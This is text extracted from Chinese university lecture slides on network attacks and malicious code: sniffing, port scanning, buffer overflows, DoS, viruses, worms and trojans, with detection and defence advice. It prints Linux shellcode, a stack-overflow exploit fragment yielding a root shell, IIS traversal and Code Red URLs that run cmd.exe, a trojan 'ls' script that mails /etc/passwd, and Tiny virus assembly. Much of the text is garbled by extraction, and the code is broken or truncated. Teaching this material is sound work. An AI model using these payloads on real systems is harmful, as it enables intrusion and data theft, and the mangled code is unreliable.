网络安全 第八讲.ppt

网络攻击与恶意移动代码,提纲,网络攻击方法窃听口令破解端口扫描和信息收集缓冲区溢出漏洞扫描拒绝服务恶意移动代码计算机病毒网络蠕虫特洛伊木马其他恶意代码,窃听（sniffer）,通过捕获网络上传输的数据包来收集敏感信息，包括用户名和密码、机密数据等。可以用来分析网络协议、查找网络故障在以太网上需要将网卡设置为混杂模式（promiscuous）常用工具：Linux:Tcpdump,Sniffit Windows:Network Monitor,sniffer,EtherealSolaris:snoop,Sniffer 的检测与防范,检测系统中的可疑的进程Unix:ps-aux,Windows Ctrl+Alt+Del 任务列表检测系统中不断增长的数据文件检查网卡是否工作在混杂模式（promiscuous）L0ph 工具：安全的网络拓扑结构网络层加密IPSec传输层加密 SSL 应用层加密,如SSH,提纲,网络攻击方法窃听口令破解端口扫描和信息收集缓冲区溢出漏洞扫描拒绝服务恶意移动代码计算机病毒网络蠕虫特洛伊木马其他恶意代码,口令破解及防范,Unix/etc/passwd,/etc/shadow 文件格式，单项加密,候选口令产生器,字典,口令文件,口令加密,口令比较,输出匹配的口令,口令破解的防范,删除没有密码的账号要求用户定期更改口令使用复杂的口令，长度8个字符，包含数字和字符不使用字典中的单词经常使用口令破解程序检查口令的强度改变Administrator账号禁止Administrator 和root 在控制台以外的地方登录,提纲,网络攻击方法窃听口令破解端口扫描和信息收集缓冲区溢出漏洞扫描拒绝服务恶意移动代码计算机病毒网络蠕虫特洛伊木马其他恶意代码,端口扫描和信息收集（续）,信息收集使用下面的网络命令可以收集许多有用的信息Ping命令Tracert/traceroute命令nslookup,查找域名/IP地址,Tracert,C:tracert Tracing route to 166.111.4.100over a maximum of 30 hops:1 10 ms 10 ms 10 ms 202.112.50.126 4 121 ms 80 ms 20 ms 202.112.38.70 5*90 ms 110 ms 166.111.255.221 7*Request timed out.Trace complete.,信息收集,Telnet、rusers、finger和host命令Telnet命令使用23端口登陆目标计算机上进入Shell状态。指定为其他端口可以观察到目标计算机在该端口上的输出，并可以在该端口输入命令。（如登陆110端口，就可以接受或删除邮件服务器上的邮件）rusers和finger收集目标计算机上的有关用户的消息,信息收集,fingerrootcvs cgi-bin#finger wsqLogin:wsq Name:(null)Directory:/home/wsq Shell:/bin/bashNo mail.No Plan.host命令和标准nslookup查询相同，显示DNS域名解析经过的路由。,端口扫描和信息收集,端口扫描对入侵者来说，每一个端口就是一个入侵通道。对目标计算机进行端口扫描，能得到许多有用的信息，从而发现系统的安全漏洞。,端口扫描,使用扫描器探测主机的各种TCP端口，检查这些端口上提供的服务和版本号。扫描器通过枚举一系列TCP端口号，连接到目标主机上并记录目标主机的应答消息，可以收集到各种有关目标主机的消息是否能匿名登陆，是否有可写ftp目录，是否可以telnet,httpd是在root还是在nobody的权限运行并不是直接的攻击,常用扫描技术,TCP connect扫描检测目标主机开了哪些端口。TCP SYN扫描发送syn包，然后发送rst包中断连接，不完成TCP三次握手，一般不会留下记录，发包需要root权限。TCP FIN扫描有些系统对syn包进行监视和记录，fin数据包可以通过而不留痕迹。但是有的系统实现下无法使用这种扫描。,常用扫描技术,IP分片扫描通过将数据包分成两个较小的IP数据包传输给目标主机，目标主机自己组成完整IP包。从而躲穿过火墙和包过滤器。TCP反向ident扫描ident协议(rfc 1413)允许通过TCP连接列出任何进程的拥有者的用户名，所以扫描器可以观察httpd是否是以root权限运行。,常用扫描技术,UDP端口扫描对端口发送UDP连接请求，检查是否有ICMP_PORT_UNREACH包返回，不一定成功。UDP recvfrom()和write()扫描不必使用root权限，使用recvfrom()和write()的回应判断端口是否开放。ICMP端口扫描通过ping命令，只能判断网络上主机是否可以到达（且开机）。,端口扫描工具,strobe,TCP 端口扫描nmap,支持以下功能TCP connect()扫描ICMP echo(ping)扫描TCP SYN扫描TCP FIN 扫描UDP扫描 操作系统识别,端口扫描和信息收集,操作系统识别通过telnet服务的标志来识别通过其他服务的标志来识别通过TCP/IP协议指纹来识别,提纲,网络攻击方法窃听口令破解端口扫描和信息收集缓冲区溢出漏洞扫描拒绝服务恶意移动代码计算机病毒网络蠕虫特洛伊木马其他恶意代码,（一)、8086的寄存器结构,3.缓冲区溢出,攻击原理1）函数调用与堆栈,int main(int argc,char*argv)char buf80;strcpy(buf,argv1);,堆栈ESS:ESP,ESP,堆栈指针,1.调用函数之前2.调用main()，将参数argc,argv，EIP压栈3.寄存器压栈，分配局部变量buf的缓冲4.读入buf数据5.退出，返回EIP所指地址,低,高,argv1,缓冲区溢出,2）利用堆栈溢出运行shell 由于gets，strcpy等函数没有对数组越界加以判断和控制，在上面程序中，读入的argv如果超过局部变量buf的声明大小80时，堆栈中保存的寄存器的值甚至返回地址EIP就会被覆盖。下面是strcpy命令的manual中对这个bug的说明：,堆栈ESS:ESP,低,高,argv1,ESP,$man strcpyBUGS If the destination string of a strcpy()is not large enough(that is,if the programmer was stupid/lazy,and failed to check the size before copying)then anything might happen.Overflowing fixed length strings is a favourite cracker technique.,缓冲区溢出,这样，将前面的程序编译为vulnerable，并设置suid位。他就成了一个具有缓冲区溢出漏洞的程序。$ls l vulnerable-rwsr-xr-x 1 root root 13658 11月 21 17:57 vulnerable,堆栈ESS:ESP,低,高,shellcode,ESP,在缓冲区中写入执行后可以运行shell的二进制机器码shellcode；其他位随意设置；EIP位设为shellcode的起点。,0 x0000,EIP,函数退出的时候，就会返回EIP作为返回地址，然后继续执行shellcode，shellcode有打开了一个shell，由于程序设置了suid位，所以打开的shell就是root shell，系统的root权限就得到了。,缓冲区溢出,如何编写shellcode？把以上程序反汇编，gcc,gdb,#include void main()char*name2;name0=“/bin/sh”;name1=NULL;execve(name0,name,NULL);exit(0);,Char shellcode=xebx1fx5ex89x76x08x31xc0 x88x46x07x89x46x0cxb0 x0b x89xf3x8dx4ex08x8dx56x0cxcdx80 x31xdbx89xd8x40 xcd x80 xe8xdcxffxffxff/bin/sh;,如何把EIP 的值设为shellcode 的起点？Strcpy(buff,shellcode,0)设将要复制到buff 中的字符串为SSSSS00000A00.00S 为shellcode,A 为shellcode 在内存中的地址为提高命中率，将字符串调整为NNNSSSSSSSAAAAAA手工调整地址,堆栈ESS:ESP,低,高,shellcode,ESP,0 x0000,EIP,#define OFFSET 0#define RET_POSITION 1024 RANGE 20 unsigned char get_sp(void)_asm_(“mov%esp,%eax”);main(int argc,char argv*)char buff RET_POSITION+RANGE+1,*ptr;long addr;unsigned long sp;int offset=OFFSET,bsize=RET_POSITION+RANGE+ALIGN+1;int i;if(argc1)offset=atoi(argv1);/*猜测入口的参数*/sp=get_sp();/*获得堆栈起始地址*/addr=sp-offset;/*计算shellcode 的实际地址*/for(i=0;ibsize;i+=4)*(long*),缓冲区溢出,输出结果：$./exploit如果不加参数，Jump to 0 xbfffec64 结果eip被修改，跳转到非法区域Segmentation fault$./exploit 500 参数500 就是对返回 之前esp的猜测值Jump to 0 xbfffea70跳转成功！#whoamiroot得到root权限了！#,缓冲区溢出,windows2000下常常利用IIS的缓冲区溢出漏洞，使用同样的原理，构造一个超长的http请求，有漏洞的IIS不对其长度进行判断，而直接把全部字符送给相应的dll程序。攻击者通过覆盖EIP，重定向到自己的shellcode中去，从而执行任意命令。,提纲,网络攻击方法窃听口令破解端口扫描和信息收集缓冲区溢出漏洞扫描拒绝服务恶意移动代码计算机病毒网络蠕虫特洛伊木马其他恶意代码,系统和应用系统漏洞统计,系统漏洞增长趋势,常见的安全漏洞(Windows平台),W1-Unicode漏洞在URL中加入一个超长的Unicode序列，可绕过Microsoft的安全检查，可以在服务器上运行可执行文件。测试：http:/victim/scripts/.%c0%af./winnt/system32/cmd.exe?/c+dir+c:详细信息：影响系统安装了IIS 4.0、IIS 5.0，而没有安装Service Pack 2的Windows 2000 server。检查系统补丁工具：hfnetchk.exe解决方法打补丁 service Pack 2:http:/,常见的安全漏洞(Windows平台),W2 ISAPI 缓冲区扩展溢出 ISAPI用于扩展IIS的功能，idq.dll没有做合适的边界检查，它们不阻塞超长字符串。攻击者可以向DLL发送数据，造成缓冲区溢出，进而控制IIS服务器。影响系统：Microsoft Index Server 2.0和Windows 2000中的Indexing Service。补丁：Windows NT 4.0:Windows 2000 Professional,Server and Advanced Server:Windows 2000 Datacenter Server:Windows 2000 Datacenter Server是基于硬件的，可以从设备生产商处获得。,常见的安全漏洞(Unix平台),U1-RPC 服务缓冲区溢出 影响的系统:Unix的大部分版本怎样确定你是否受影响:rpc.ttdbserverd rpc.cmsd rpc.statd 防范关闭或删除这些服务 在路由或防火墙关闭RPC 端口(port 111)安装最新的补丁 http:/http:/更详细的文档见：,常见的安全漏洞(Unix平台),U2-Sendmail 漏洞 影响：大部分Unix版本；防范在不是邮件服务器和代理服务器上，不要 运行Sendmail。更新Sendmail到最新版本或安装相应的补丁文件.,常见的安全漏洞(Unix平台),U3-Bind 脆弱性 过期版本的Bind还存在缓冲区溢出的问题，攻击者可以用来获取未经授权的权限。根据1999年中期的调查，连接在Internet上的50的DNS服务器运行的都是易受攻击的版本。影响：多个 UNIX and Linux 系统建议：在所有不是DNS服务器的机器上，取消BIND name daemon（称为 named）.有些专家建议删除DNS软件。在被制定为DNS服务器的机器上升级到最新版本和补丁版本。采用下面的文章中的建议：NXT 漏洞:QINV(Inverse Query)和NAMED 漏洞:,常见的安全漏洞(Unix平台),LPD(remote print protocol daemon)影响系统：Solaris 2.6,2.7,8防范：补丁Sun如果对远程的打印处理不是必要的，在/etc/inetd.conf 中关闭打印设备。限制到 port 515/tcp 的连接。,常见的安全漏洞(Unix平台),U6 sadmind and mountd Sadmind 允许远程登陆到Solaris 系统进行管理，Mountd 控制和判断到安装在UNIX主机上的NFS的连接。这些应用的缓冲区溢出能被攻击者利用获取root的存取权限。在直接与Internet连接的机器上关闭或者删除sadmind 和 mountd.安装最新的补丁http:/http:/http:/support,常见漏洞扫描,NSShttp:/Strobehttp:/SATANhttp:/NESSUShttp:/,漏洞扫描的原理,已知不同平台、不同操作系统/版本、不同应用的漏洞；检查具有安全漏洞的服务是否存在攻击性测试：exploit,提纲,网络攻击方法窃听口令破解端口扫描和信息收集缓冲区溢出漏洞扫描拒绝服务恶意移动代码计算机病毒网络蠕虫特洛伊木马其他恶意代码,拒绝服务攻击,拒绝服务攻击（Deny Of Service）是一种广泛存在的系统攻击，其特点是使目标主机停止网络服务，而不是获取主机的控制权。DOS攻击常常在没有获得主机的任何帐号就可以进行，只有连在网络上的主机就有可能被攻击。主要手段是耗尽以下电脑资源：web服务器允许的最多请求数系统磁盘空间网络带宽进程内存空间CPU处理能力、处理队列,teardrop攻击 正常IP包 teardrop包 较早的Linux版本由于计算时没有检查这种错误情况，得到的第二个分段长度小于0，使用memcpy函数时将数据拷贝到内核中。,拒绝服务攻击,OOB攻击 利用Windows95/NT下的NETBIOS网络协议对带外数据处理（OOB，out of band）的漏洞，将一个包以OOB的方式，发送到某个端口上（通常是139,138,137,113），就可能使系统突然死机。,拒绝服务攻击,smurf攻击广播信息可以发送到整个网络中的机器；主机收到ICMP echo请求包时，会自动回应ICMP应答包；smurf攻击使用被攻击者的IP地址，伪造ICMP echo广播包，发送给成百上千台计算机；然后这些计算机都会按照包里提到的源地址，即被攻击者的IP地址回送ICMP回应；被攻击者主机或网络资源耗尽,拒绝服务攻击,TFN攻击（Tribe Flood Network）在系统漏洞得到修补的情况下，teardrop、OOB等攻击不再有效。另一类攻击则简单的使用大量的网络传输而攻击目标，而一对一的攻击是不可能取道足够的效果的，所以出现了分布式拒绝服务攻击（DDOS），TFN是一个最著名的DDOS工具。TFN的监控程序通过和其他主机上的TFN客户端的通讯（使用ICMP_ECHOREPLY包），同时对目标主机进行ICMP、SYNflood等各种攻击 2000年2月7日，yahoo!被TFN攻击，发向其站点路由器的包在1G/s以上。yahoo数小时瘫痪，损失12亿美元以上。,DDOS攻击,提纲,网络攻击方法窃听口令破解端口扫描和信息收集缓冲区溢出漏洞扫描拒绝服务恶意移动代码计算机病毒网络蠕虫特洛伊木马其他恶意代码,恶意移动代码（MMC）,恶意移动代码(Malicious Mobile Code)是一段计算机程序，能够在计算机或网络之间传播，未经授权、故意修改计算机系统。代码（Code）移动（Mobile）恶意（Malicious）,MMC种类,计算机病毒（Virus）特洛伊木马(Trojan)蠕虫(Worm)HTML中的恶意脚本（script）其他任何攻击性或欺骗性的、可传播的代码 MacroJava AppletActiveXJava ScriptsVB Scripts,可执行的内容,各种恶意移动代码的融合趋势,计算机网络的普及，文件共享电子邮件应用黑客攻击的手段社会工程（social engineering)Code Red 和 Nimda,提纲,网络攻击方法窃听口令破解端口扫描和信息收集缓冲区溢出漏洞扫描拒绝服务恶意移动代码计算机病毒网络蠕虫特洛伊木马其他恶意代码,计算机病毒的定义,多种定义方式计算机病毒是一个指令序列，它能够把自身的拷贝插入到其他宿主程序中；计算机病毒是隐藏在计算机系统的数据资源中，利用系统数据资源进行繁殖并生存，并能影响计算机系统正常运行的并通过系统数据共享进行传染的程序。我国中华人民共和国计算机信息系统安全保护条例第二十八条：计算机病毒，是指编制或者在计算机程序中插入的破坏计算机功能或者毁坏数据，影响计算机使用，并能自我复制的一组计算机指令或者程序代码。“,计算机病毒的主要特点,是一段可执行的程序(code)广泛的传染性（Mobile)自我复制，通过多种渠道传播危害性(Malicious)破坏数据的完整性和可用性破坏数据的保密性系统和资源的可用性。隐蔽性和潜伏性感染后不一定立刻发作；依附于其他文件、程序、介质，不被发现可触发性触发条件：日期、时间、文件类型,计算机病毒原理,内容提要,病毒结构模型病毒的分类引导型病毒文件型病毒宏病毒病毒举例病毒防范,计算机病毒的结构,传染条件判断,传染代码,表现及破坏条件判断,破坏代码,传染模块,表现模块,计算机病毒的分类,按攻击平台分类：DOS,Win32，MAC，Unix按危害分类：良性、恶性按代码形式：源码、中间代码、目标码按宿主分类：引导型主引导区操作系统引导区文件型操作系统应用程序宏病毒,引导型病毒引导记录,主引导记录（MBR）,A,引导型病毒系统引导过程,Power On,CPU&ROM BIOS Initializes,POST Tests,Look for boot device,MBR bootPartition Table Load,DOS Boot Sector Runs,Loads IO.SYSMSDOS.SYS,DOS Loaded,引导型病毒感染与执行过程,系统引导区,引导正常执行,病毒,引导系统,病毒体,病毒的激活过程,内存空间,空闲区,带病毒程序,int8,int8,int8,int8,int8,int8,int8,int8,int8,int8,int8,int8,空闲区,正常程序,正常程序,正常程序,int8,是,破坏！,int8,举例小球病毒（Bouncing Ball),在磁盘上的存储位置,文件分配表,病毒的第二部分,000号扇区,001号扇区,第一个空簇,正常的引导扇区,正常的引导扇区,病毒的第一部分,感染后的系统启动过程,启动,将病毒程序的第一部分送入内存高端,将第二部分装入内存，与第一部分拼接在一起,读入真正的Boot 区代码，送到0000:TC00处,修改INT 13 中断向量，指向病毒,转移到 0000:TC00处，开始真正的系统引导,触发条件修改后的INT 13,进入INT 13中断,病毒检测原理,特征匹配例如，在香港病毒:1F 58 EA 1A AF 00 F0 9C:POP AXJMP F000AF1APUSHF行为监控对中断向量表的修改对引导记录的修改对.exe,.com文件的写操作驻留内存软件模拟,防范与检测,数据备份不要用移动介质启动（设置CMOS选项）设置CMOS的引导记录保护选项安装补丁，并及时更新安装防病毒软件，及时更新病毒定义码限制文件共享不轻易打开电子邮件的附件没有病毒处理前不要使用其他移动介质不要运行不可信的程序移动介质写保护,文件型病毒文件结构,.COM文件.EXE 文件,PSP Header(256 bytes),Code,Data,StackSegment(s)(64K Bytes),代码、数据、堆栈在通一段中在内存中的.COM是磁盘文件的镜像,PSP Header(512 bytes),Code Segment(s)(64K),Data Segment(s)(64K),Stack Segment(s)(64K),其他可执行的文件类型,.BAT.PIF.SYS.DRV.OVR.OVL.DLL.VxD,正常程序,程序头,程序头,程序头,程序头,程序头,程序头,程序头,程序头,程序头,程序头,程序头,程序头,程序头,程序头,程序头,程序头,病毒程序头,程序头,病毒程序,病毒程序,病毒程序,病毒程序,程序头,文件型病毒感染机理,文件型病毒举例,最简单的病毒Tiny-32(32 bytes)寻找宿主文件打开文件把自己写入文件关闭文件,MOV AH,4E;setup to find a fileINT 21;find the host fileMOV AX,3D02;setup to open the host fileINT 21;open host fileMOV AH,40;setup to write file to diskINT 21;write to fileDB*.COM;what files to look for,宏病毒（Macro Virus）,历史：1980年，Dr.Fredrick Cohen and Ralf Burger 论文1994年，Microsoft Word 第一例宏病毒Word,Excel,Access,PowerPoint,Project,Lotus AmiPro,Visio,Lotus 1-2-3,AutoCAD,Corel Draw.使用数据文件进行传播，使得反病毒软件不再只关注可执行文件和引导区DOE ViRT 统计，85%的病毒感染归因于宏病毒易于编写，只需要一两天的时间，1015行代码大量的用户：90 Million MS Office Users人们通常不交换程序，而交换数据,宏病毒工作机理,有毒文件.doc,Normal.dot,无毒文件.doc,Normal.dot,注意事项,Macro 可以存在模板里，也可以存在文档里RTF文件也可以包含宏病毒通过IE 浏览器可以直接打开，而不提示下载,提纲,网络攻击方法窃听口令破解端口扫描和信息收集缓冲区溢出漏洞扫描拒绝服务恶意移动代码计算机病毒网络蠕虫特洛伊木马其他恶意代码,蠕虫（Worm）,一个独立的计算机程序，不需要宿主自我复制，自主传播（Mobile）占用系统或网络资源、破坏其他程序不伪装成其他程序，靠自主传播利用系统漏洞；利用电子邮件（无需用户参与）,莫里斯蠕虫事件,发生于1988年，当时导致大约6000台机器瘫痪主要的攻击方法Rsh，rexec：用户的缺省认证Sendmail 的debug模式Fingerd的缓冲区溢出口令猜测,CR I,主要影响Windows NT系统和Windows 2000主要影响国外网络据CERT统计，至8月初已经感染超过25万台主要行为利用IIS 的Index服务的缓冲区溢出缺陷进入系统检查c:notworm文件是否存在以判断是否感染中文保护（是中文windows就不修改主页）攻击白宫！,CR II,Inspired by RC I影响波及全球国内影响尤其广泛主要行为所利用缺陷相同只感染windows2000系统，由于一些参数的问题，只会导致NT死机休眠与扫描：中文windows，600个线程,Nimda 简介,影响系统：MS win9x,wind2k,win XP传播途径：Email、文件共享、页面浏览、MS IIS目录遍历、Code Red 后门影响群发电子邮件，付病毒扫描共享文件夹，扫描有漏洞的IIS,扫描有Code Red后门的IIS Server,红色代码病毒,红色代码病毒是一种结合了病毒、木马、DDOS机制的蠕虫。2001年7月中旬，在美国等地大规模蔓延。2001年8月初，出现变种coderedII，针对中文版windows系统，国内大规模蔓延。通过80端口传播。只存在与网络服务器的内存，不通过文件载体。利用IIS缓冲区溢出漏洞（2001年6月18日发布）,CodeRed I,在侵入一台服务器后，其运行步骤是：设置运行环境，修改堆栈指针，设置堆栈大小为218h字节。接着使用RVA（相对虚拟地址）查找GetProcAddress的函数地址，然后就获得其他socket、connect、send、recv、closesocket等函数地址；如果C:notworm在，不再进一步传染；传染其他主机。创造100个线程，其中99个用户感染其他WEB服务器，被攻击IP通过一个算法计算得出；篡改主页，如果系统默认语言为“美国英语”，第100个进程就将这台服务的主页改成“Welcome to!,Hacked By Chinese!”，并持续10个小时。（这个修改直接在内存中修改，而不是修改*.htm文件）；如果时间在20：00UTC和23：59UTC之间，将反复和白宫主页建立连接，并发送98k字节数据，形成DDOS攻击。,CodeRed II,增加了特洛依木马的功能，并针对中国网站做了改进计算IP的方法进行了修改，使病毒传染的更快；检查是否存在CodeRedII原子，若存在则进入睡眠状态防止反复感染，若不存在则创建CodeRedII原子；创建300个线程进行传染，若系统默认语言为简体中文或繁体中文，则创建600个线程；检查时间。病毒作者的意图是传播过程在2001年10月1日完成，之后，蠕虫会爆发而使系统不断重新启动。在系统中安装一个特洛依木马：拷贝系统目录cmd.exe到IIS的脚本执行目录下，改名为root.exe；将病毒体内的木马解压缩写到C盘和D盘的explorer.exe木马每次系统和启动都会运行，禁止系统的文件保护功能，并将C盘和D盘通过web服务器共享,CodeRed II,攻击形式http:/x.x.x.x/c/inetpub/scripts/root.exe?/c+dirhttp:/x.x.x.x/c/winnt/system32/cmd.exe?/c+dir 其中是被攻击的IP地址，dir可以是任意命令，比如删除系统中的文件，向外发送机密数据等，这个后门后来也成为了nimda病毒的一个传播模式。下面是cert/cc上提供的被攻击服务器日志(CA-2001-11)2001-05-06 12:20:19 10.10.10.10-10.20.20.20 80 GET/scripts/././winnt/system32/cmd.exe/c+dir 200 2001-05-06 12:20:19 10.10.10.10-10.20.20.20 80 GET/scripts/././winnt/system32/cmd.exe/c+dir+.200,红色代码病毒的检测和防范,针对安装IIS的windows系统；是否出现负载显著增加（CPU/网络）的现象；用netstat an检查是否有许多对外的80端口连接在web日志中检查是否有/default.ida?xxx.%u0078%u0000 u00=a HTTP/1.0这样的攻击记录；查找系统中是否存在文件c:explorer.exe或d:explorer.exe以及root.exe；检查注册表文件中是否增加了C和D虚拟目录，以及文件保护功能是否被禁止。在任务管理器中检查是否存在两个explorer.exe进程。,提纲,网络攻击方法窃听口令破解端口扫描和信息收集缓冲区溢出漏洞扫描拒绝服务恶意移动代码计算机病毒网络蠕虫特洛伊木马其他恶意代码,特洛伊木马,名字来源：古希腊故事通过伪装成其他程序、有意隐藏自己恶意行为的程序，通常留下一个远程控制的后门没有自我复制的功能非自主传播用户主动发送给其他人放到网站上由用户下载,最简单的木马举例,ls#!/bin/sh/bin/mail/etc/passwdls,PATH=./:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin,特洛依木马举例,Back OrificeCult of the Dead Cow在1998年8月发布,公开源码软件，遵守GPL，是功能强大的远程控制器木马。boserver.exe、boconfig.exe、bogui.exe在BO服务器上启动、停止基于文本的应用程序目录和文件操作。包括创建、删除、查看目录、查找、解压、压缩。共享。创建共享资源HTTP服务。启动或停止HTTP服务。击键记录。将BO服务器上用户的击键记录在一个文本文件中，同时记录执行输入的窗口名。（可以获得用户口令）,特洛依木马,视频输入、播放。捕捉服务器屏幕到一个位图文件中。网络连接。列出和断开BO服务器上接入和接出的连接，可以发起新连接。查看信息。查看所有网络端口、域名、服务器和可见的共享“出口”。返回系统信息，包括机器名、当前用户、CPU类型、内存容量及可用内存、Windows版本、驱动器类型、硬盘容量及使用空间。端口重定向。注册表锁住或重启计算机。传输文件,特洛依木马,使用netstat a 检查是否还有未知端口监听(默认31337)检测和删除注册表HLMsoftwaremicrosoftwindowscurrentVersionrunservices键值，是否有“Name Data.exe”，若有则删除C:windowssystem目录：删除“.exe”文件和windll.dll文件,特洛依木马,其他木马国外subsever、dagger、ACKcmdC、DeepThroat、SatansBackdoor 等国内（更常见）冰河、广外女生、netspy、黑洞等,删除木马的通用方法,Win.ini文件windows节中run=和loadsystem.ini文件boot节的shell=explorer.exeAutoexec.bat文件win命令注册表HLMsoftwaremicrosoftwindowscurrentversionrunHCUsoftwaremicrosoftwindowscurrentversionrunonceHCRexefileshellopencommand“%1”%*HCUcontrol paneldesktopwallpaper,更高级的木马技术,服务器端程序文件的隐藏问题：磁盘上的文件、系统中的进程木马：DLL 陷阱防范：DLL 签名技术隐藏端口监听寄生：选择一个已经打开的端口，如80潜伏：不使用TCP/UDP,使用ICMP突破防火墙的限制反弹端口型木马：,突破防火墙的限制:反弹端口型木马,Web Server,病毒、蠕虫与木马的比较,提纲,网络攻击方法窃听口令破解端口扫描和信息收集缓冲区溢出漏洞扫描拒绝服务恶意移动代码计算机病毒网络蠕虫特洛伊木马其他恶意代码,功能病毒特征码的数量与更新的速度检测能力查全率,误报率清除能力实时防范与保护能力性能算法与软件结构升级速度,水木清华BBS Virus 板,紫丁香（哈工大）BBS Virus 板,华南木棉 BBS Virus 板,